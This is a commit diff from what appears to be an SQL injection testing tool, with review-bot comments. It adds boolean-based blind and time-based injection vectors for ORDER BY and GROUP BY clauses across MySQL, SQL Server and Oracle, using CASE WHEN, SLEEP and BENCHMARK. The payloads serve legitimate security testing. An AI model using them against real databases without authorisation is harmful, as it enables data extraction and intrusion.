Done with support for injection in ORDER BY and GROUP BY (hopefully)
This commit is contained in:
parent
91c3cf8fd0
commit
9d55c4da87
@ -155,14 +155,14 @@ class Agent:
|
|||
# payload, do not put a space after the prefix
|
||||
if kb.technique == 4:
|
||||
query = kb.injection.prefix
|
||||
elif kb.injection.clause == [2, 3] or kb.injection.clause == [ 2 ]:
|
||||
if kb.technique != 3:
|
||||
query = kb.injection.prefix
|
||||
elif kb.technique and kb.technique in kb.injection.data:
|
||||
where = kb.injection.data[kb.technique].where
|
||||
|
||||
if where == 3:
|
||||
query = kb.injection.prefix
|
||||
elif kb.injection.clause == [2, 3] or kb.injection.clause == [ 2 ]:
|
||||
if kb.technique != 3:
|
||||
query = kb.injection.prefix
|
||||
|
||||
if query is None:
|
||||
query = "%s " % kb.injection.prefix
|
||||
|
@ -212,6 +212,12 @@ class Agent:
|
|||
|
||||
payload = payload.replace("[ORIGVALUE]", origvalue)
|
||||
|
||||
if kb.dbms is not None:
|
||||
# NOTE: ugly hack due to queries.xml's <inference> tag
|
||||
# starting with 'AND ' string
|
||||
inferenceQuery = queries[kb.dbms].inference.query[4:]
|
||||
payload = payload.replace("[INFERENCE]", inferenceQuery)
|
||||
|
||||
return payload
|
||||
|
||||
def getComment(self, reqObj):
|
||||
|
|
|
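Review bot: When `kb.dbms` is still `None` the new `if kb.dbms is not None:` block in the second hunk is skipped, so the `[INFERENCE]` marker that the new generic vectors in payloads.xml introduce (`<vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))</vector>`) is returned verbatim inside the payload unless something outside this hunk resolves it first. The fixed `[4:]` slice also assumes every `<inference>` query starts with `AND `; a guarded form, `inferenceQuery = queries[kb.dbms].inference.query` followed by `if inferenceQuery.upper().startswith("AND "): inferenceQuery = inferenceQuery[4:]`, keeps the admitted hack from silently truncating a query that does not. In the first hunk the test `kb.injection.clause == [2, 3] or kb.injection.clause == [ 2 ]` is now written twice and, if `clause` is the parsed `<clause>` list, never matches the ORDER BY-only payloads this commit adds with `<clause>3</clause>`, which then fall through to the `"%s " % kb.injection.prefix` default; a single helper such as `_isGroupOrOrderByClause(kb.injection.clause)` would make the intended set explicit. The enclosing method begins before the first hunk and `getComment` continues past the second.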
@ -402,7 +402,6 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||
</request>
|
||||
|
@ -418,7 +417,6 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=[RANDNUM]</payload>
|
||||
</request>
|
||||
|
@ -430,6 +428,24 @@ Formats:
|
|||
|
||||
|
||||
<!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
||||
<!-- TODO: check against Microsoft Access and SAP MaxDB -->
|
||||
<!-- NOTE: this does not behave as expected against SQLite -->
|
||||
<test>
|
||||
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||
<stype>1</stype>
|
||||
|
@ -437,7 +453,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||
</request>
|
||||
|
@ -457,7 +473,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
|
@ -476,7 +492,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<vector>, (SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
|
@ -495,7 +511,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<vector>, (SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
|
||||
</request>
|
||||
|
@ -507,24 +523,6 @@ Formats:
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<!-- TODO: check against Microsoft Access and SAP MaxDB -->
|
||||
<!-- NOTE: this does not behave as expected against SQLite -->
|
||||
<test>
|
||||
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
|
||||
<stype>1</stype>
|
||||
|
@ -552,7 +550,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<vector></vector>
|
||||
<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
|
@ -571,7 +569,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<vector></vector>
|
||||
<vector>(SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
|
@ -590,7 +588,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<vector></vector>
|
||||
<vector>(SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
|
||||
</request>
|
||||
|
@ -611,7 +609,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<vector></vector>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
|
||||
</request>
|
||||
|
@ -1216,7 +1214,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
|
||||
<vector>AND IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
|
||||
<request>
|
||||
<payload>AND SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
|
@ -1236,7 +1234,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
|
||||
<vector>AND IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
|
||||
<request>
|
||||
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
|
@ -1303,7 +1301,7 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
|
||||
<vector>OR IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
|
||||
<request>
|
||||
<payload>OR SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
|
@ -1323,7 +1321,7 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
|
||||
<vector>OR IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
|
||||
<request>
|
||||
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
|
|
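Review bot: The DBMS-specific boolean-based GROUP BY/ORDER BY vectors (`<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ...`) keep the raw `%s`/`%d` inference template, while the generic test in the same block and the MySQL time-based tests at the end of the diff switch to `[INFERENCE]`, so the file now expresses the same inference slot in two ways. If `[INFERENCE]` is expanded from each DBMS's `<inference>` query at runtime, the DBMS-specific vectors could use it as well and stay in sync with that query; if they are spelled out deliberately, a comment on the first such `<vector>` saying why would save the next reader from "fixing" it. The header comment `<!-- NOTE: this does not behave as expected against SQLite -->` would be more useful with its reason, e.g. `<!-- NOTE: the ELSE branch relies on the DBMS raising on 1/0 (or on a multi-row subquery); SQLite evaluates 1/0 to NULL, so the condition is not observable there -->`, which is presumably the cause given that every vector in the block signals the false branch through an error.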